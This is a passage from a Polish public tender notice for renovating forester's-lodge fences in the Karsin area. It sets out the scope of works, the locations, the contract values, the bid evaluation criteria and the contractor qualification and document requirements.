zamówień, o których mowa w pkt 5.2 objęte będą czynności<br/>określone w załączonych do SWZ, przedmiarze robót, których opis technologii wykonania przedstawia specyfikacja techniczna<br/>wykonania i odbioru robót oraz roboty budowlane podobne do nich oraz w projekcie budowlanym.<br/>4 Zakres rzeczowy robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 nie przekroczy wartości 50%<br/>wartości niniejszego zamówienia.<br/>5 Zamówienia, o których mowa w pkt 5.2 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia<br/>publicznego w trybie zamówienia z wolnej ręki.<br/>6 Zamówienia, o których mowa w pkt 5.2 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót,<br/>stanowiących przedmiot zamówienia na skutek zaistnienia zmian w rozmiarze przedmiotowego zamówienia oraz wystąpienia<br/>nowych zadań gospodarczych lub publicznych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie Oferta Wykonawcy, która otrzyma<br/>najwyższa sumę punktów w niżej wymienionych kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	CZĘŚĆ ZAMÓWIENIA NR 3 – Remont ogrodzenia leśniczówki Leśnictwa Karsin.<br/><br/>Opis przedmiotu zamówienia:<br/>Realizacja robót budowlanych, objętych niniejsza częścią zamówienia, polegać będzie na wykonaniu ścinki, karczowaniu krzaków oraz poszyć roślinnych, rozbiórki istniejącego ogrodzenia z siatki i sztachet na słupkach wraz z fundamentem betonowym w całości wraz z wywiezieniem materiałów rozbiórkowych z terenu działki na miejscowe składowisko odpadów budowlanych. Materiały niebezpieczne dla środowiska należy zutylizować w specjalnych zakładach – zgodnie z obowiązującymi w tym zakresie przepisami. Ostatnim etapem realizacji zamówienia będzie wykonanie projektowanego ogrodzenia z desek kompozytowych, siatki oraz murowanego.<br/>Szczegółowe dane dotyczące przedmiotu zamówienia zawarte są w przedmiarze robót budowlanych stanowiącym załącznik nr 15 do SWZ, w szczegółowych specyfikacjach technicznych wykonania i odbioru robót budowlanych, które stanowią załącznik nr 16 do SWZ oraz w dokumentacji projektowej, na którą składają się: projekt architektoniczno-budowlany, projekt zagospodarowania terenu budowlanym, informacja dotycząca bezpieczeństwa i ochrony zdrowia, stanowiącej załącznik nr 17 do SWZ.<br/><br/>Miejsce lokalizacji zamówienia publicznego:<br/>Przedmiotowa droga jest zlokalizowana, zgodnie z adresem leśnym, na terenie Regionalnej Dyrekcji Lasów Państwowych w Gdańsku, w Nadleśnictwie Kościerzyna, w Leśnictwie Karsin, w oddziale 739f. <br/>Zgodnie z powszechną ewidencją gruntów, przedmiot niniejszego zamówienia położony jest w Województwie Pomorskim, na terenie Powiatu Kościerskiego, na obszarze gminy Karsin, w obrębie ewidencyjnym Bąk, na działce ewidencyjnej nr 739/4.<br/>Zgodnie z adresem pocztowym, przedmiot zamówienia jest położony w Cisewiu 36, kod pocztowy: 83-440 Karsin.<br/><br/>6)	Gwarancja jakości i rękojmia udzielone przez Wykonawcę na wykonany przedmiot zamówienia winny wynosić co najmniej 24 miesięcy i nie więcej niż 60 miesięcy. Zamawiający może wykorzystać niezależnie od uprawnień wynikających z gwarancji, uprawnienia z rękojmi w okresie udzielonej przez Wykonawcę gwarancji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 111672,03 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, dla wszystkich części zamówienia. Poniższe<br/>postanowienia odnoszą się do każdej z części zamówienia.<br/>2 Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia<br/>udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót budowlanych podobnych do robót<br/>budowlanych stanowiących przedmiot niniejszego zamówienia.<br/>3 Zakresem rzeczowym robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 objęte będą czynności<br/>określone w załączonych do SWZ, przedmiarze robót, których opis technologii wykonania przedstawia specyfikacja techniczna<br/>wykonania i odbioru robót oraz roboty budowlane podobne do nich oraz w projekcie budowlanym.<br/>4 Zakres rzeczowy robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 nie przekroczy wartości 50%<br/>wartości niniejszego zamówienia.<br/>5 Zamówienia, o których mowa w pkt 5.2 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia<br/>publicznego w trybie zamówienia z wolnej ręki.<br/>6 Zamówienia, o których mowa w pkt 5.2 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót,<br/>stanowiących przedmiot zamówienia na skutek zaistnienia zmian w rozmiarze przedmiotowego zamówienia oraz wystąpienia<br/>nowych zadań gospodarczych lub publicznych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie Oferta Wykonawcy, która otrzyma<br/>najwyższa sumę punktów w niżej wymienionych kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4)	CZĘŚĆ ZAMÓWIENIA NR 4 – Remont ogrodzenia leśniczówki szkółki leśnej w Bąku.<br/><br/>Opis przedmiotu zamówienia:<br/>Realizacja robót budowlanych, objętych niniejsza częścią zamówienia, polegać będzie na wykonaniu ścinki, karczowaniu krzaków oraz poszyć roślinnych, rozbiórki istniejącego ogrodzenia z siatki i sztachet na słupkach wraz z fundamentem betonowym w całości wraz z wywiezieniem materiałów rozbiórkowych z terenu działki na miejscowe składowisko odpadów budowlanych. Materiały niebezpieczne dla środowiska należy zutylizować w specjalnych zakładach – zgodnie z obowiązującymi w tym zakresie przepisami. Ostatnim etapem realizacji zamówienia będzie wykonanie projektowanego ogrodzenia z desek kompozytowych, siatki oraz murowanego.<br/>Szczegółowe dane dotyczące przedmiotu zamówienia zawarte są w przedmiarze robót budowlanych stanowiącym załącznik nr 18 do SWZ, w szczegółowych specyfikacjach technicznych wykonania i odbioru robót budowlanych, które stanowią załącznik nr 19 do SWZ oraz w dokumentacji projektowej, na którą składają się: projekt architektoniczno-budowlany, projekt zagospodarowania terenu budowlanym, informacja dotycząca bezpieczeństwa i ochrony zdrowia, stanowiącej załącznik nr 20 do SWZ.<br/><br/>Miejsce lokalizacji zamówienia publicznego:<br/>Przedmiotowa droga jest zlokalizowana, zgodnie z adresem leśnym, na terenie Regionalnej Dyrekcji Lasów Państwowych w Gdańsku, w Nadleśnictwie Kościerzyna, w Leśnictwie Karsin, w oddziale 733l. <br/>Zgodnie z powszechną ewidencją gruntów, przedmiot niniejszego zamówienia położony jest w Województwie Pomorskim, na terenie Powiatu Kościerskiego, na obszarze gminy Karsin, w obrębie ewidencyjnym Bąk, na działce ewidencyjnej nr 258.<br/>Zgodnie z adresem pocztowym, przedmiot zamówienia jest położony w Cisewiu 16A, kod pocztowy: 83-440 Karsin.<br/><br/>Gwarancja jakości i rękojmia udzielone przez Wykonawcę na wykonany przedmiot zamówienia winny wynosić co najmniej 24 miesięcy i nie więcej niż 60 miesięcy. Zamawiający może wykorzystać niezależnie od uprawnień wynikających z gwarancji, uprawnienia z rękojmi w okresie udzielonej przez Wykonawcę gwarancji. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 128143,39 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, dla wszystkich części zamówienia. Poniższe<br/>postanowienia odnoszą się do każdej z części zamówienia.<br/>2 Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia<br/>udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót budowlanych podobnych do robót<br/>budowlanych stanowiących przedmiot niniejszego zamówienia.<br/>3 Zakresem rzeczowym robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 objęte będą czynności<br/>określone w załączonych do SWZ, przedmiarze robót, których opis technologii wykonania przedstawia specyfikacja techniczna<br/>wykonania i odbioru robót oraz roboty budowlane podobne do nich oraz w projekcie budowlanym.<br/>4 Zakres rzeczowy robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.2 nie przekroczy wartości 50%<br/>wartości niniejszego zamówienia.<br/>5 Zamówienia, o których mowa w pkt 5.2 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia<br/>publicznego w trybie zamówienia z wolnej ręki.<br/>6 Zamówienia, o których mowa w pkt 5.2 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót,<br/>stanowiących przedmiot zamówienia na skutek zaistnienia zmian w rozmiarze przedmiotowego zamówienia oraz wystąpienia<br/>nowych zadań gospodarczych lub publicznych.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie Oferta Wykonawcy, która otrzyma<br/>najwyższa sumę punktów w niżej wymienionych kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności<br/>technicznej lub zawodowej:<br/>a) Zamawiający uzna, że Wykonawca spełnia warunki dotyczące zdolności technicznej lub zawodowej, jeżeli wykaże<br/>wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej 2 roboty budowlane – polegające na przebudowie lub (i) budowie lub<br/>(i) remoncie ogrodzeń, o wartości każda jedna robota co najmniej 50.000,00 zł brutto, odpowiadające swoim rodzajem<br/>robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, to znaczy, co najmniej wykonaniem robót<br/>polegających na wznoszeniu kompletnych ogrodzeń.<br/>W celu wykazania spełnienia warunku udziału w postępowaniu Wykonawca nie może sumować robót o mniejszym zakresie<br/>rzeczowo-wartościowym.<br/>b) Zamawiający uzna, że Wykonawca spełnia warunki dotyczące zdolności technicznej lub zawodowej, jeżeli wykaże<br/>dysponowanie osobą skierowaną do realizacji zamówienia publicznego, posiadającą uprawnienia do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności<br/>ogólnobudowlanej, czy też posiadającą odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów prawa.<br/>UWAGA!!!<br/>Jeżeli Wykonawca ubiega się o udzielenie zamówienia na dwa, trzy lub cztery części zamówienia (zadania) może celem<br/>wykazania spełnienia warunków udziału w postępowaniu wskazywać te same zadania odpowiadające swoim rodzajem<br/>robotom budowlanym stanowiącym przedmiot zamówienia oraz tę sama osobę skierowaną przez wykonawcę do realizacji<br/>zamówienia publicznego posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do<br/>kierowania robotami budowlanymi w specjalności ogólnobudowlanej, czy też posiadającą odpowiadające im ważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa w więcej niż jednej części<br/>zamówienia.<br/>Sytuacja ekonomiczna i finansowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji<br/>ekonomicznej i finansowej:<br/>a) Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dotyczącej sytuacji ekonomicznej.<br/>b) Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe<br/>lub zdolność kredytową w wysokości co najmniej 30.000,00 zł.<br/>UWAGA!!!<br/>Powyższa wartość środków dotyczy tylko jednej części zamówienia. W przypadku, gdy Wykonawca ubiega się o więcej niż jedną część zamówienia musi udowodnić, że dysponuje wielokrotnością powyższej kwoty proporcjonalnie do liczby części<br/>zamówienia, o które się ubiega, to znaczy: jeżeli Wykonawca ubiega się o jedną część zamówienia, musi dysponować<br/>środkami pieniężnymi lub zdolnością kredytową w wysokości co najmniej 30.000,00 zł; jeżeli o dwie części – co najmniej<br/>60.000,00 zł; jeżeli o trzy części – co najmniej 90.000,00 zł; jeżeli o cztery części – co najmniej 120.000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1 Oświadczenie<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy<br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 poz. 275 z późn. zm.), z innym Wykonawcą, który<br/>złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>2 Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku<br/>zalegania z opłacaniem podatków lub opłat, wraz z zaświadczeniem, Zamawiający żąda złożenia przez Wykonawcę dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo<br/>przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>3 Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,<br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia przez<br/>Wykonawcę dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału<br/>w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>4 Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>5 Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.<br/>Dokumenty podmiotów zagranicznych<br/>6 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Zaświadczenia<br/>właściwego naczelnika urzędu skarbowego&#34; lub &#34;Zaświadczenia właściwej terenowej jednostki organizacyjnej ZUS lub KRUS&#34; składa<br/>dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że<br/>Wykonawca nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>7 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Odpisu lub<br/>informacji z KRS lub CEIDG&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej<br/>niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1 Wykaz<br/>osób skierowanych do realizacji zamówienia – Załącznik nr 3 do SWZ<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Z załączonego wykazu ma wynikać, że wykonawca dysponuje lub będzie dysponować osobą posiadającą uprawnienia do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności ogólnobudowlanej, czy też<br/>posiadającą odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa,<br/>niezależnie od liczby części zamówienia, na które składa ofertę.<br/>2 Wykaz robót budowanych – Załącznik nr 4 do SWZ<br/>Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi<br/>Wykonawcami, wykaz robót budowlanych dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio<br/>uczestniczył.<br/>Z załączonego wykazu ma wynikać, że wykonawca wykonał co najmniej 2 roboty budowlane –polegające na przebudowie lub (i)<br/>budowie lub (i) remoncie ogrodzeń, o wartości każda jedna robota co najmniej 50.000,00 zł brutto, odpowiadające swoim rodzajem<br/>robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, to znaczy, co najmniej na wznoszeniu kompletnych<br/>ogrodzeń, niezależnie od liczby części zamówienia, na które składa ofertę.<br/>3 Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych<br/>lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Z załączonej (przedłożonej) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w celu spełnienia przez<br/>Wykonawcę warunku w odniesieniu do sytuacji finansowej, musi wynikać, że Wykonawca posiada środki finansowe lub zdolność<br/>kredytową w wysokości co najmniej 30.000,00 zł.<br/>UWAGA!!!<br/>Powyższa wartość środków dotyczy tylko jednej części zamówienia. W przypadku, gdy Wykonawca ubiega się o więcej niż jedną<br/>część zamówienia musi udowodnić, że dysponuje wielokrotnością powyższej kwoty proporcjonalnie do liczby części zamówienia, o<br/>które się ubiega, to znaczy: jeżeli Wykonawca ubiega się o jedną część zamówienia, musi dysponować środkami pieniężnymi lub<br/>zdolnością kredytową w wysokości co najmniej 30.000,00 zł; jeżeli o dwie części – co najmniej 60.000,00 zł; jeżeli o trzy części – co<br/>najmniej 90.000,00 zł; jeżeli o cztery części – co najmniej 120.000,00 zł.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1 Formularz oferty – Załącznik nr 1 do SWZ<br/>Dokument sporządzony i wypełniony przez Wykonawcę według załącznika nr 1 do niniejszej SWZ.<br/>2 Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału – Załącznik nr 2 SWZ<br/>Aktualne na dzień składania ofert oświadczenie Wykonawcy, stanowiące wstępne potwierdzenie spełniania warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia<br/>3 Kosztorys ofertowy<br/>Dokument sporządzony przez Wykonawcę metodą uproszczoną na podstawie przedmiaru robót, będącym załącznikiem nr 9, 12, 15 lub 18 do SWZ – w zależności, o udzielenie której części zamówienia Wykonawca się ubiega.<br/>Wykonawca sporządza kosztorys na podstawie odpowiedniego dla danej części zamówienia przedmiaru robót, o której udzielenie się ubiega. W przypadku ubiegania się przez Wykonawcę o dwie, trzy lub cztery części zamówienia, Wykonawca musi załączyć do oferty wszystkie odrębne kosztorysy ofertowe na części zamówienia, o które się ubiega. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span 